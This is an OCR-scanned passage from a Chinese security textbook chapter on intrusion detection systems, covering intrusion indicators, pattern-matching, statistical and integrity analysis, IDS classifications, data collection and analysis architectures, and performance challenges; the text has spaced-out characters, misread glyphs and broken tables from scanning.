入 侵 的 必要 条 件 。 日 志 中 包含 发 生 在 系统 和 网 络 上 的 不 寻常 和 不 期 望 活 动 的 证 据 , 这 些 证 
据 可 以 指出 有 人 正在 入侵 或 已 经 成 功 和 人 侵 了 系统 。 通 过 查看 日 志文 件 ,能 够 发 现成 功 的 人 
侵 或 入 侵 企图 ,并 很 快 地 启动 相应 的 应 急 响应 程序 。 日 志文 件 中 记录 了 各 种 行为 类 型 ,每 种 
类 型 又 包含 不 同 的 信息 ,例如 ,记录 “用 户 活动 ”类 型 的 日 志 , 就 包含 登录 、 用 户 ID 改变 、 用 户 
对 文件 的 访问 、 授 权 和 认证 信息 等 内 容 。 很 显然 ,对 用 户 活 动 来 讲 ,不 正常 的 或 不 期 望 的 行 
为 就 是 重复 登录 失败 ,登录 到 不 期 望 的 位 置 以 及 非 授权 的 企图 访问 重要 文件 等 。 


2. 目录 和 文件 中 的 不 期 望 的 改变 


网 络 环境 中 的 文件 系统 包含 很 多 软件 和 数据 文件 ,其 中 包含 重要 信息 的 文件 和 包含 私 
有 数据 文件 经 常 是 黑客 修改 或 破坏 的 目标 。 目 录 和 文件 中 的 不 期 望 的 改变 (包括 修改 ,创建 
和 删除 ) ,特别 是 那些 正常 情况 下 的 限制 访问 ,很 可 能 就 是 一 种 人 侵 产生 的 指示 和 信号 。 黑 
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客 经 常 蔡 换 \ 修 改 和 破坏 他 们 获得 访问 权 的 系统 上 的 文件 ,同时 为 了 隐藏 系统 中 他 们 的 表现 
及 活动 痕迹 ,他 们 都 会 尽力 去 蔡 换 系统 程序 或 修改 系统 日 志文 件 。 


3. 程序 执行 中 的 不 期 望 行为 


网 络 系统 上 的 程序 执行 一 般 包括 操作 系统 、 网 络 服务 、 用 户 启动 的 程序 和 特定 目的 的 应 
用 ,例如 数据 库 服务 器 。 每 个 在 系统 上 执行 的 程序 由 一 或 多 个 进程 来 实现 。 每 个 进程 在 具 
有 不 同 权 限 的 环境 中 执行 ,这 种 环境 控制 着 进程 可 访问 的 系统 资源 ,程序 和 数据 文件 等 。 一 
个 进程 的 执行 行为 由 它 运行 时 执行 的 操作 来 表现 ,操作 执行 的 方式 不 同 , 它 利用 的 系统 资源 
也 就 不 同 。 操 作 包 括 计 算 、 文 件 传输 、 设 备 和 其 他 进程 ,以 及 与 网 络 间 其 他 进程 的 通信 。 

一 个 进程 出 现 了 不 期 望 的 行为 可 能 表明 黑客 正在 入 侵 用 户 的 系统 。 黑 客 可 能 会 将 程序 
或 服务 的 运行 分 解 , 从 而 导致 它 失败 ,或 者 是 以 非 用 户 或 管理 员 和 希望 的 方式 操作 。 


4. 物理 形式 的 入 侵 信 息 


这 包括 两 个 方面 的 内 容 , 一 是 对 网 络 硬件 的 未 授权 连接 ; 二 是 对 物理 资源 的 未 授权 访 
问 。 黑 客 会 想方设法 突破 网 络 的 周边 防卫 ,如 果 他 们 能 够 在 物理 上 访问 内 部 网 ,他 们 就 能 安 
装 自己 的 设备 和 软件 。 然 后 利用 这 些 设备 和 软件 去 访问 网 络 。 例 如 ,用 户 在 家 里 可 能 安装 
modem 以 访问 远程 办 公 室 ,与 此 同时 ,黑客 利用 自动 工具 来 识别 在 公共 电话 线 上 的 
modem, 如 果 某 个 拨号 访问 流量 经 过 了 这 些 自动 工具 ,那么 这 个 拨号 访问 就 成 为 了 威胁 网 
络 安 全 的 后 门 。 黑 客 就 会 利用 这 个 后 门 来 访问 内 部 网 , 偷 取 敏感 的 私有 信息 。 


10.1.7 IDS 信号 分 析 


对 于 收集 到 的 有 关系 统 、 网 络 、 数 据 及 用 户 活动 的 状态 和 行为 等 信息 ,一 般 通 过 三 种 技 
术 手 段 进行 分 析 : 模式 匹配 ,统计 分 析 和 完整 性 分 析 。 其 中 前 两 种 方法 用 于 实时 的 入 侵 检 
测 ,而 完整 性 分 析 则 用 于 事后 分 析 。 下 面 对 三 种 技术 手段 进行 详细 介绍 。 


1. 模式 匹配 


模式 匹配 就 是 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 库 进行 比较 ,从 
而 发 现 违背 安全 策略 的 行为 。 该 过 程 可 以 很 简单 (如 通过 字符 串 匹 配 以 寻找 一 个 简单 的 条 
目 或 指令 ), 也 可 以 很 复杂 (如 利用 正规 的 数学 表达 式 来 表示 安全 状态 的 变化 )。 一 般 来 讲 ， 
一 种 进攻 模式 可 以 用 一 个 过 程 (如 执行 一 条 指令 ) 或 一 个 输出 (如 获得 权限 ) 来 表示 。 该 方法 
的 优点 是 只 需 收 集 相 关 的 数据 集合 ,从 而 减少 了 系统 负担 , 且 技术 已 相当 成 熟 。 它 与 病毒 防 
火 墙 采 用 的 方法 一 样 ,检测 准确 率 和 效率 都 相当 高 。 但 是 ,该 方法 存在 的 弱点 是 不 能 检测 出 
从 未 出 现 过 的 黑客 攻击 手段 , 它 需要 不 断 地 进行 升级 以 对 付 不 断 出 现 的 黑客 攻击 手段 。 


2. 统计 分 析 


统计 分 析 方 法 首先 给 系统 对 象 (如 用 户 文件 .目录 和 设备 等 ) 创 建 一 个 统计 描述 ,统计 
正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失败 次 数 和 延 时 等 )。 测 量 属 性 的 平均 值 将 
被 用 来 与 网 络 、 系 统 的 行为 进行 比较 ,任何 观察 值 在 正常 值 范围 之 外 时 ,就 认为 有 入 侵 行为 
发 生 。 例 如 ,统计 分 析 可 能 标志 一 个 不 正常 行为 ,因为 它 发 现 一 个 在 晚 八 点 至 早 六 点 不 登录 
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的 账户 却 在 凌晨 两 点 试图 登录 。 其 优点 是 可 检测 到 未 知 的 和 更 为 复杂 的 人 侵 ,缺点 是 误 报 、 
漏 报 率 高 , 且 不 适应 用 户 正常 行为 的 突然 改变 。 具 体 的 统计 分 析 方 法 如 基于 专家 系统 的 、 基 
于 模型 推理 的 和 基于 神经 网 络 的 分 析 方法 ,目前 正 处 于 热点 研究 和 迅速 发 展 中 。 


3. 完整 性 分 析 


完整 性 分 析 主要 关注 某 个 文件 或 对 象 是 否 被 更 改 , 这 经 常 包 括 文 件 和 目录 的 内 容 及 属 
性 , 它 在 发 现 是 否 应 用 程序 被 更 改 、 被 特洛伊 化 这 方面 特别 有 效 。 完 整 性 分 析 利用 强 有 力 的 
加 密 机 制 , 如 消息 摘要 函数 (例如 MD5), 它 能 识别 哪怕 是 微小 的 变化 。 其 优点 是 不 管 模式 
匹配 方法 和 统计 分 析 方法 能 否 发 现 人 侵 ,只 要 是 攻击 导致 了 文件 或 其 他 对 象 的 改变 , 它 就 能 
够 发 现 。 缺 点 是 一 般 以 批 处 理 方式 实现 ,不 用 于 实时 响应 。 尽 管 如 此 ,完整 性 检测 方法 还 应 
该 是 网 络 安全 产品 的 必要 手段 之 一 。 例 如 ,可 以 在 每 一 天 的 某 个 特定 时 间 内 开启 完整 性 分 
析 模 块 ,对 网 络 系统 进行 全 面 的 扫描 检查 。 


10.2 IDS 的 分 类 


本 节 根 据 检测 的 原理 、 体 系 结构 和 输入 数据 特征 对 入 侵 侦 测 系统 (IDS) 进 行 分 类 介绍 。 
1021 根据 检测 原理 分 类 


根据 传统 的 观点 将 入 侵 行 为 的 属性 分 为 异常 和 滥用 两 种 ,然后 分 别 对 其 建立 异常 检测 
模型 和 滥用 检测 模型 。 近 几 年 来 又 出 现 了 一 些 新 的 检测 方法 ,它们 所 产生 的 模型 对 异常 检 
测 和 滥用 检测 都 适用 ,如 人工 免疫 方法 、 遗 传 算法 和 数据 挖掘 等 。 根 据 系 统 所 采用 的 检测 模 
型 ,将 IDS 分 为 三 类 。 以 下 是 对 这 三 类 IDS 的 详细 介绍 。 


1. 异常 检测 


异常 检测 也 可 被 称 为 基于 模型 的 检测 。 使 用 异常 检测 时 ,必须 为 系统 中 的 每 个 用 户 建 
立 模 型 ,有 些 系统 可 能 会 自动 为 各 个 用 户 建立 模型 。 不 管 是 人 工 方式 还 是 自动 方式 ,在 建立 
该 模型 之 前 ,首先 必须 建立 统计 概率 模型 ,明确 所 观察 对 象 的 正常 情况 ,然后 决定 在 何 种 程 
度 上 将 一 个 行为 标 为 “异常 ”, 并 如 何 做 出 具体 决策 。 

异常 检测 从 模型 的 类 型 上 可 以 分 为 采用 统计 抽样 的 异常 检测 .基于 规则 的 异常 检测 、 采 
用 神经 网 络 的 异常 检测 三 种 ,下 面 对 这 三 种 异常 检测 进行 简要 概述 。 

(1) 采用 统计 抽样 的 异常 检测 

如 果 采 用 统计 方式 来 创建 模型 ,警报 的 产生 就 是 基于 对 用 户 所 定义 的 正常 状态 的 背离 。 
即 通过 计算 标准 偏差 来 测量 对 正常 状态 的 背离 程度 ,通过 改变 产生 警报 所 需 的 标准 偏差 数 
字 , 用 户 可 以 控制 IDS 的 敏感 度 。 这 也 可 以 用 来 粗略 地 限制 IDS 所 产生 的 虚假 警报 数目 。 
因为 当 将 标准 偏差 数字 设置 地 较 大 时 , 较 小 的 用 户 背 离 行为 就 不 容易 导致 产生 虚假 警报 。 

(2) 基于 规则 的 异常 检测 

这 种 异常 检测 使 用 规则 来 定义 正常 的 用 户 行为 。 在 部 署 这 种 系统 时 ,需要 一 定 的 时 间 
段 来 为 不 同 的 用 户 分 析 其 正常 的 数据 流 , 然 后 为 之 制定 对 应 的 规则 。 规 则 之 外 的 任何 行为 
都 将 被 认为 是 异常 的 ,并 将 会 产生 警报 。 制 定 描述 正常 行为 的 规则 是 一 件 复 杂 的 工作 。 
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(3) 采用 神经 网 络 的 异常 检测 

神经 网 络 是 人 工 智 能 的 一 种 形式 , 它 试 图 模仿 生物 神经 元 的 工作 原理 。 当 使 用 这 种 系 
统 时 ,需要 通过 为 之 提供 大 量 的 与 数据 有 关 的 数据 和 规则 来 训练 它 。 这 些 信息 被 用 来 调整 
神经 元 之 间 的 连接 。 在 系统 被 训练 后 ,网 络 数据 流 将 被 用 作对 神经 网 络 的 刺激 信息 ,以 确定 
这 些 数据 流 是 否 属于 正常 的 范畴 。 

异常 检测 从 实现 方式 上 可 以 分 为 自学 习 系 统 和 编程 系统 两 种 。 

自学 习 系 统 通过 学 习 事例 构建 正常 行为 模型 ,又 可 分 为 时 序 和 非 时 序 两 种 。 编 程 系统 
需要 通过 编程 学 习 如 何 检测 确定 的 异常 事件 ,从 而 让 用 户 知道 什么 样 的 异常 行为 能 够 破坏 
系统 的 安全 。 编 程 系统 可 以 再 细 分 为 描述 统计 和 默认 否认 两 种 。 

从 实现 方式 上 异常 检测 IDS 分 类 如 表 10. 1 所 示 。 


表 10.1 异常 检测 分 类 表 


非 时 序 规则 建设 Wisdom& Seme 
自学 习 型 描述 统计 IDES NIDESEMERALD 
时 序 人 工 神经 网 络 Hyperview 
简单 统计 MIDASNADIR 
描述 统计 基于 简单 规则 NSM 
本 崩 各 门限 Computer Watch 
默认 否认 状态 序列 建 模 DPEM、JANUS 


异常 检测 的 优点 在 于 ,首先 ,它们 可 以 很 容易 地 探测 到 很 多 内 部 攻击 行为 。 如 权限 很 低 
的 用 户 试图 使 用 管理 员 指令 时 ,就 可 能 会 触发 一 次 警报 。 其 次 ,攻击 者 很 难 确定 什么 样 的 行 
为 会 引发 告警 。 在 一 个 基于 特征 的 IDS 中 ,攻击 者 可 以 在 实验 环境 中 测试 哪些 数据 流 会 产 
生 警 报 。 通 过 这 种 手段 ,攻击 者 就 可 以 制造 出 特别 的 工具 来 越过 基于 特征 的 IDS。 而 在 异 
常 检测 系统 中 ,攻击 者 无 法 知道 所 用 的 训练 数据 ,因此 ,也 就 不 能 发 现 探查 不 出 来 的 特别 行 
为 了 。 总 之 ,异常 检测 的 警报 不 是 基于 特定 的 ` 已 知 攻击 的 特征 ,而 是 基于 定义 正常 用 户 行 
为 的 模型 。 所 以 ,异常 检测 型 IDS 可 以 对 原先 未 被 公布 的 攻击 产生 警报 ,只 要 这 些 行 为 与 
正常 的 用 户 行为 不 同 。 因 此 异常 检测 型 IDS 可 以 在 新 的 攻击 方式 被 第 一 次 使 用 时 就 探 
测 到 。 

异常 检测 的 缺点 在 于 ,首先 其 初始 训练 的 时 间 较 长 ,在 训练 过 程 中 不 能 保护 网 络 , 这 个 
问题 是 不 可 避免 的 。 其 次 ,异常 检测 较 难 定义 正常 的 行为 , 当 用 户 习惯 改变 时 ,必须 更 新 用 
户 模型 。 这 个 缺点 无 形 中 增加 了 和 警报 的 次 数 ,或 者 没有 检测 出 真正 的 攻击 行为 。 再 次 ,异常 
检测 的 复杂 性 高 ,不 容易 解释 系统 是 如 何 工作 的 。 在 基于 特征 的 IDS 中 ,如 果 系 统 看 到 一 
个 特定 的 数据 序列 ,就 会 产生 一 次 警报 。 而 在 异常 检测 型 IDS 中 ,需要 使 用 复杂 的 统计 方 
法 ,或 者 与 神经 网 络 相 关 的 信息 理论 。 当 用 户 不 能 完全 理解 这 种 IDS 时 ,就 会 感到 不 安 , 或 
者 减少 对 IDS 的 信心 。 


2. 滥用 检测 


滥用 检测 又 称 特征 检测 。 它 能 够 准确 地 探查 与 具体 特征 相 匹 配 的 入 侵 行为 。 这 些 特 征 
基于 一 组 规则 ,与 攻击 者 非法 访问 目标 网 络 的 典型 模式 和 漏洞 相 匹 配 。 
建立 明确 定义 的 特征 可 以 减少 发 出 虚假 警报 的 机 会 ,同时 还 能 保持 较 低 的 漏 报 率 。 一 
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个 配置 较 好 的 滥用 检测 型 IDS 产生 的 虚假 警报 也 较 少 。 如 果 滥 用 检测 型 IDS 总 是 产生 虚 
假 警报 ,那么 它 的 整体 效能 就 会 大 大 受 损 。 

滥用 检测 通过 对 已 知 决策 规则 编程 实现 ,可 以 分 为 以 下 四 种 。 

@ 状态 建 模 : 它 将 入侵 行为 表示 成 很 多 个 不 同 的 状态 。 如 果 在 观察 某 个 可 疑 行为 期 
间 , 所 有 状态 都 存在 , 则 判定 为 恶意 人 侵 。 状 态 建 模 从 本 质 上 讲 是 时 间 序 列 模型 ,可 以 再 细 
分 为 状态 转换 和 Petri 网 ,前 者 将 入 侵 行为 的 所 有 状态 形成 一 个 简单 的 遍历 链 ,后 者 将 所 有 
状态 构成 一 个 更 广义 的 树 形 结构 的 Petri 网 .2 

@ 专家 系统 : 它 可 以 在 给 定 入侵 行为 描述 规则 的 情况 下 ,对 系统 的 安全 状态 进行 推 
理 。 一 般 情 况 下 ,专家 系统 的 检测 能 力 强 大 ,灵活 性 也 很 大 ,但 计算 成 本 较 高 ,通常 以 降低 执 
行 速度 为 代价 。 

@ 串 匹 配 : 它 通过 对 系统 之 间 传 输 的 或 系统 自身 产生 的 文本 进行 子 串 匹配 实现 。 该 
方法 灵活 性 较 差 ,但 易于 理解 ,目前 有 很 多 高 效 的 算法 执行 速度 都 很 快 。 

@ 基于 简单 规则 : 类 似 于 专家 系统 ,但 相对 简单 一 些 。 

滥用 检测 IDS 分 类 如 表 10. 2 所 示 。 


表 10.2 滥用 检测 分 类 表 


状态 转换 USTAT 
状态 建 模 Petri 网 IDIOT 
专家 系统 NIDES.EMERALD、MIDAS、DIDS 
串 匹 配 NSM 
基于 简单 规则 的 监测 方法 NADIR ASAX、Bro Haystack 


滥用 检测 型 IDS 的 优点 在 于 ,首先 在 滥用 检测 型 IDS 中 ,特征 数据 库 中 每 一 种 攻击 都 
有 一 个 特征 名 和 标志 。 用 户 可 以 查看 数据 库 中 的 所 有 特征 ,并 确定 IDS 需要 为 之 发 警报 的 
攻击 类 型 。 因 为 用 户 可 以 了 解 特征 数据 库 中 的 具体 攻击 类 型 ,所 以 用 户 对 这 种 IDS 比较 有 
信心 。 当 新 的 攻击 类 型 出 现时 ,用 户 也 可 以 检测 自己 的 IDS 中 是 否 已 经 进行 了 相应 的 更 
新 。 其 次 ,用 户 容 易 理 解 滥 用 检测 型 IDS 的 工作 原理 。 在 这 种 IDS 中 ,警报 和 攻击 之 间 存 
在 着 一 对 一 的 关系 。 用 户 可 以 通过 产生 攻击 数据 流 的 方法 来 测试 IDS 是 否 发 出 警报 。 再 
次 ,滥用 检测 型 IDS 在 安装 后 就 能 立即 工作 ,与 异常 检测 型 IDS 不 同 ,滥用 检测 型 IDS 不 需 
要 经 过 初始 的 训练 阶段 。 

滥用 检测 型 IDS 的 缺点 在 于 ,首先 为 了 检测 攻击 ,滥用 检测 型 IDS 需要 对 数据 信息 进 
行 分 析 , 并 将 之 与 数据 库 中 的 特征 进行 比较 。 然 而 ,这 些 信息 有 时 会 跨越 多 个 数据 包 。 当 一 
个 特征 涉及 到 多 个 数据 包 时 ,IDS 就 必须 从 它 看 到 的 第 一 个 数据 包 开 始 ,为 该 特征 维持 相关 
的 状态 信息 ,这 就 需要 一 定 的 存储 空间 (通常 由 内 存 来 承担 ) ,而 攻击 者 也 会 蓄意 占 满 有 限 的 
存储 空间 。 其 次 , 随 着 新 的 攻击 类 型 的 出 现 ,滥用 检测 型 IDS 所 用 的 特征 数据 库 必须 不 断 
地 进行 更 新 。 特 征 数 据 库 的 及 时 更 新 ,对 于 基于 特征 的 IDS 的 功效 是 至 关 重 要 的 。 然 而 保 
证 特征 数据 库 的 不 断 更 新 是 比较 困难 的 。 再 次 ,滥用 检测 型 IDS 不 能 检测 到 未 公布 的 攻 


中 ”Petri 网 是 对 离散 并 行 系统 的 数学 表示 。Petri 网 是 20 世纪 60 年 代 由 C. A. 佩 特 里 发 明 的 ,适合 于 描述 异步 的 、 
并 发 的 计算 机 系统 模型 。Petri 网 既 有 严格 的 数学 表述 方式 ,也 有 直观 的 图 形 表 达 方 式 。 由 于 Petri 网 能 表达 并 发 的 事 
件 , 被 认为 是 自动 化 理论 的 一 种 。 研 究 领 域 趋向 认为 Petri 网 是 所 有 流程 定义 语言 之 母 。 
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全 ,这 使 得 滥用 检测 型 IDS 显得 相当 被 动 。 
3. 混合 检测 


近 几 年 来 ,混合 检测 日 益 受 到 人 们 的 重视 。 这 类 检测 在 做 出 决策 之 前 , 既 分 析 系 统 的 正 
常 行为 ,同时 还 观察 可 疑 的 入 侵 行为 .所 以 判断 更 全 面 \ 准 确 、 可 靠 。 它 通常 根据 系统 的 正常 
数据 流 来 检测 入 侵 行 为 ,故而 也 有 人 称 其 为 “启发 式 特征 检测 ”。 

Wenke Lee 从 数据 挖掘 中 得 到 启示 ,开发 出 了 一 个 混合 检测 器 Ripper。 它 并 不 为 不 同 
的 和 人 侵 行为 分 别 建立 模型 ,而 是 首先 通过 大 量 的 事例 学 习 什么 是 入 侵 行为 以 及 什么 是 系统 
的 正常 行为 ,发 现 描述 系统 特征 的 统一 使 用 模式 ,然后 再 形成 对 异常 和 滥用 都 适用 的 检测 
模型 。 


1022 根据 体系 结构 分 类 
按照 体系 结构 ,IDS 可 分 为 集中 式 、 等 级 式 和 协作 式 三 种 ,各 种 人 侵 检测 系统 按 此 分 类 
的 情况 如 表 10. 3 所 示 。 


表 10.3 IDS 分 类 


Haystack .MIDAS.IDES.、W&S.Computer Watch. NSM.NADIR.ASAX.DPEM. NIDES 
GrIDS.EMERALD.DIDS 
CSM、AAFID 


等 级 式 


下 面 对 这 三 种 IDS 进行 详细 介绍 。 


1. 集中 式 


这 种 结构 的 IDS 有 多 个 分 布 于 不 同 主机 上 的 审计 程序 ,但 只 有 一 个 中 央 入 侵 检测 服务 
器 。 审 计 程 序 把 本 机 收集 到 的 可 疑 数据 发 送 给 中 央 入 侵 检测 服务 器 进行 分 析 处 理 。 这 种 结 
构 的 IDS 在 可 伸缩 性 、 可 配置 性 方面 存在 致命 的 缺陷 : 第 一 , 随 着 网 络 规模 的 增加 ,主机 审 
计 程 序 和 服务 器 之 间 传 送 的 数据 量 就 会 骤 增 ,导致 网 络 性 能 大 大 降低 ; 第 二 ,系统 安全 性 脆 
弱 , 一 旦 人 侵 检测 中 央 服 务 器 出 现 故障 ,整个 系统 就 会 陷 人 瘫痪 ; 第 三 ,根据 各 个 主机 的 不 
同 需求 来 配置 服务 器 也 非常 复杂 。 


2. 等 级 式 


它 用 来 监控 大 型 网 络 ,定义 了 若干 个 等 级 的 监控 区 ,每 个 IDS 负责 一 个 区 ,每 一 级 IDS 
只 负责 所 监控 区 的 分 析 , 然 后 将 本 区 的 分 析 结果 传送 给 上 一 级 IDS。 这 种 结构 仍 存在 两 个 
问题 : 第 一 , 当 网 络 拓扑 结构 改变 时 ,区 域 分 析 结果 的 汇总 机 制 也 需要 做 相应 的 调整 ; 第 
二 ,这 种 结构 的 IDS 最 后 还 是 要 把 各 区 收集 到 的 结果 传送 到 最 高 级 的 检测 服务 器 进行 全 局 
分 析 , 所 以 系统 的 安全 性 并 没有 实质 性 的 改进 。 


3. 协作 式 


将 中 央 检 测 服务 器 的 任务 分 配给 多 个 基于 主机 的 IDS, 这 些 IDS 不 分 等 级 ,各 司 其 
只 ,负责 监控 本 地 主机 的 某 些 活动 。 所 以 其 可 伸缩 性 、 安 全 性 都 得 到 了 显著 的 提高 ,但 维 
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护 成 本 也 提高 了 很 多 ,并 且 增 加 了 所 监控 主机 的 工作 负荷 ,如 通信 和 机制、 审计 开销 和 踪迹 
分 析 等 。 


1023 根据 输入 数据 特征 分 类 


入 侵 检测 系统 根据 输入 数据 的 来 源 可 以 分 为 以 下 三 类 。 

Q@ 基于 主机 的 入 侵 检测 系统 : 其 输入 数据 来 源 于 系统 的 审计 日 志 , 一 般 只 能 检测 该 主 
机 上 发 生 的 入 侵 。 

@ 基于 网 络 的 入 侵 检 测 系统 : 其 输入 数据 来 源 于 网 络 的 信息 流 ,能 够 检测 该 网 段 上 发 
生 的 网 络 入 侵 。 

@ 采用 上 述 两 种 数据 来 源 的 分 布 式 入 侵 检 测 系统 ,能 够 同时 分 析 来 自主 机 系统 审计 日 
志和 网 络 数据 流 的 人 侵 检 测 系统 ,一 般 为 分 布 式 结构 ,由 多 个 部 件 组 成 。 

目前 的 分 类 方法 虽然 在 某 些 方面 有 很 好 的 检测 效果 ,但 从 总 体 来 看 都 各 有 不 足 , 孤 立地 
去 检测 都 是 不 可 取 的 。 因 而 ,现在 越 来 越 多 的 和 人 侵 检测 系统 都 同时 具有 几 方 面 的 技术 ,这 些 
技术 互相 补充 不 足 ,共同 完成 检测 任务 。 


10.3 IDS 的 体系 结构 


IDS 在 结构 上 可 划分 为 数据 收集 和 数据 分 析 两 种 机 制 。 
1031 数据 收集 机 制 


数据 收集 机 制 在 IDS 中 占据 着 举足轻重 的 地 位 。 如 果 收 集 的 数据 时 延 较 大 ,检测 就 会 
失去 作用 ; 如 果 数 据 不 完整 ,系统 的 检测 能 力 就 会 下 降 ; 如 果 由 于 错误 或 人 侵 者 的 行为 导 
致 收集 的 数据 不 正确 ,IDS 就 会 无 法 检测 到 某 些 入 侵 , 给 用 户 以 安全 的 假象 。 下 面 介绍 几 种 
数据 收集 机 制 。 


1. 分 布 式 与 集中 式 数据 收集 机 制 


。 分 布 式 数据 收集 : 检测 系统 收集 的 数据 来 自 一 些 固定 位 置 而 且 与 受 监视 的 网 元 数 
量 无 关 。 
。 集中 式 数 据 收集 : 检测 系统 收集 的 数据 来 自 一 些 与 受 监视 的 网 元 数量 有 一 定 比 例 
关系 的 位 置 。 
集中 式 和 分 布 式 数据 收集 方式 的 区 别 通常 是 衡量 IDS 数据 收集 能 力 的 标志 ,两 种 数据 
收集 机 制 几乎 以 相同 的 比例 应 用 于 当前 的 IDS 产品 中 。 


2. 直接 监控 和 间接 监控 


如 果 IDS 从 它 所 监控 的 对 象 处 直接 获得 数据 , 则 称 为 直接 监控 ; 反之 ,如 果 IDS 依赖 一 
个 单独 的 进程 或 工具 获得 数据 , 则 称 为 间接 监控 。 

就 检测 入 侵 行为 而 言 ,直接 监控 要 优 于 间接 监控 ,但 由 于 直接 监控 操作 的 复杂 性 ,目前 
只 有 不 足 20% 的 IDS 产品 使 用 了 直接 监控 机 制 。 
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3. 基于 主机 的 数据 收集 和 基于 网 络 的 数据 收集 


基于 主机 的 数据 收集 是 从 所 监控 的 主机 上 获取 数据 ; 基于 网 络 的 数据 收集 是 通过 被 监 
视 网 络 中 的 数据 流 获 取 数 据 。 总 体 而 言 , 基 于 主机 的 数据 收集 要 优 于 基于 网 络 的 数据 收集 。 


4. 外 部 探测 器 和 内 部 探测 器 


外 部 探测 器 是 负责 监测 主机 中 某 个 组 件 ( 硬 件 或 软件 ) 的 软件 。 它 向 IDS 提供 所 需 的 
数据 ,这 些 操作 是 通过 独立 于 系统 的 其 他 代码 来 实施 的 。 

内 部 探测 器 是 负责 监测 主机 中 某 个 组 件 ( 硬 件 或 软件 ) 的 软件 。 它 向 IDS 提供 所 需 的 
数据 ,这 些 操作 是 通过 该 组 件 的 代码 来 实施 的 。 

外 部 探测 器 和 内 部 探测 器 在 用 于 数据 收集 时 各 有 利 次 ,可 以 综合 使 用 。 由 于 内 部 探测 
器 实现 起 来 的 难度 较 大 ,所 以 在 现 有 的 IDS 产品 中 ,只 有 很 少 的 一 部 分 采用 这 种 探测 器 。 


1032 数据 分 析 机 制 


根据 IDS 处 理 数 据 的 方式 ,可 以 将 IDS 分 为 分 布 式 IDS 和 集中 式 IDS。 

。 分 布 式 IDS: 在 一 些 与 受 监 视 组 件 相应 的 位 置 对 数据 进行 分 析 的 IDS。 

。 集中 式 IDS: 在 一 些 固定 且 不 受 监视 组 件数 量 限制 的 位 置 对 数据 进行 分 析 的 IDS。 
注意 这 些 定 义 是 基于 受 监视 组 件 的 数量 而 不 是 主机 的 数量 ,所 以 ,如 果 在 系统 中 的 
不 同 组 件 中 进行 数据 分 析 , 除 了 安装 集中 式 IDS 外 ,还 要 在 一 个 主机 中 安装 分 布 式 数据 
分 析 的 IDS。 分 布 式 和 集中 式 IDS 都 可 以 使 用 基于 主机 、 基 于 网 络 或 两 者 兼备 的 数据 收 


集 方式 。 


分 布 式 IDS 与 集中 式 IDS 的 优 缺 点 如 表 10. 4 所 示 。 
表 10.4 分布 式 IDS 与 集中 式 IDS 对 比 表 


特性 


集中 式 


分 布 式 


可 靠 性 
容错 


增加 额外 的 系统 
开销 


可 扩容 性 


平缓 地 降低 服务 


等 级 


动态 地 重新 配置 


动 IDS 


仅 需 运行 较 少 的 组 件 

容易 使 系统 从 崩溃 中 恢复 ,但 也 容 
易 被 故障 中 断 

仅 在 分 析 组 件 中 增加 了 一 些 开 销 ， 
那些 被 赋予 了 大 量 负载 的 主机 应 
专门 用 做 分 析 

IDS 的 组 件数 量 被 限定 , 当 被 监视 
主机 的 数量 增加 时 ,需要 更 多 的 计 
算 和 存储 资源 处 理 新 增 的 负载 
如 果 有 一 个 分 析 组 件 停止 了 工作 ， 
一 部 分 程序 和 主机 就 不 再 被 监视 ， 
但 整个 IDS 仍 在 继续 工作 

使 用 很 少 的 组 件 来 分 析 所 有 的 数 
据 , 如 果 重 新 配置 则 需要 重新 启 


需要 运行 较 多 的 组 件 

由 于 分 布 特性 ,所 有 数据 存储 时 很 难保 持 
一 致 性 和 可 恢复 性 

由 于 运行 的 组 件 不 大 ,主机 上 增加 的 开销 
很 小 ,但 对 大 部 分 被 监视 的 主机 增加 了 额 
外 开销 

分 布 式 系统 可 以 通过 增加 组 件 的 数量 来 监 
视 更 多 的 主机 ,但 扩充 容量 将 会 受到 新 增 
组 件 之 间 需 要 相互 通信 的 制约 

如 果 有 一 个 分 析 组 件 停止 了 工作 ,整个 
IDS 就 有 可 能 停止 工作 


很 容易 进行 重新 配置 ,不 会 影响 其 他 部 分 
的 性 能 
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1033 缩短 数据 收集 与 数据 分 析 的 距离 


在 实际 操作 过 程 中 ,数据 收集 和 数据 分 析 通 常 被 划分 成 两 个 步骤 ,在 不 同 的 时 间 甚 至 是 
不 同 的 地 点 进行 。 但 这 种 分 离 存在 着 缺点 ,在 实际 使 用 过 程 中 ,数据 收集 与 数据 分 析 功 能 之 
间 应 尽量 缩短 距离 。 


10.4 人 侵 检 测 系统 面临 的 三 大 挑战 


IDS 是 近 十 几 年 发 展 起 来 的 新 一 代 安 全 防范 技术 , 它 通 过 对 计算 机 网 络 或 系统 中 的 若 
干 关键 点 收集 信息 并 对 其 进行 分 析 , 从 中 发 现 是 否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 
这 是 一 种 集 检 测 ,记录 报警 和 响应 等 功能 于 一 身 的 动态 安全 技术 , 它 不 仅 能 检测 来 自 外 部 
的 入 侵 行为 ,同时 也 能 监督 内 部 用 户 的 未 授权 活动 。IDS 技术 主要 面临 如 下 三 大 挑战 。 下 
面 的 内 容 是 对 这 三 大 挑战 的 概述 。 


1041 如 何 提高 系统 的 检测 速度 


网 络 安全 设备 的 处 理 速度 一 直 是 影响 网 络 性 能 的 一 大 瓶颈 ,虽然 IDS 通常 是 以 并 联 方 
式 接 人 网 络 的 ,但 如 果 其 检测 速度 跟 不 上 网 络 数据 的 传输 速度 ,那么 检测 系统 就 会 漏 掉 其 中 
的 部 分 数据 包 , 从 而 导致 漏 报 进而 影响 系统 的 准确 性 和 有 效 性 。 在 IDS 中 ,截获 网 络 的 每 
一 个 数据 包 , 并 分 析 、 匹 配 其 中 是 否 具 有 某 种 攻击 的 特征 需要 花费 大 量 的 时 间 和 系统 资源 ， 
而 大 部 分 现 有 的 IDS 只 有 几 十 兆 字 节 的 检测 速度 , 随 着 百 兆 、 甚 至 千 兆 网 络 的 大 量 应 用 ， 
IDS 技术 发 展 的 速度 已 经 远 落 后 于 网 络 速度 的 发 展 。 


1042 如 何 减 少 系统 的 漏 报 和 误 报 


基于 模式 匹配 分 析 方 法 的 IDS 将 所 有 入 侵 行 为 和 手段 及 其 变种 ,表达 为 一 种 模式 或 特 
征 , 检 测 主 要 判别 网 络 中 搜集 到 的 数据 特征 是 否 在 入 侵 模式 库 中 出 现 ,因此 , 面 对 每 天 都 有 
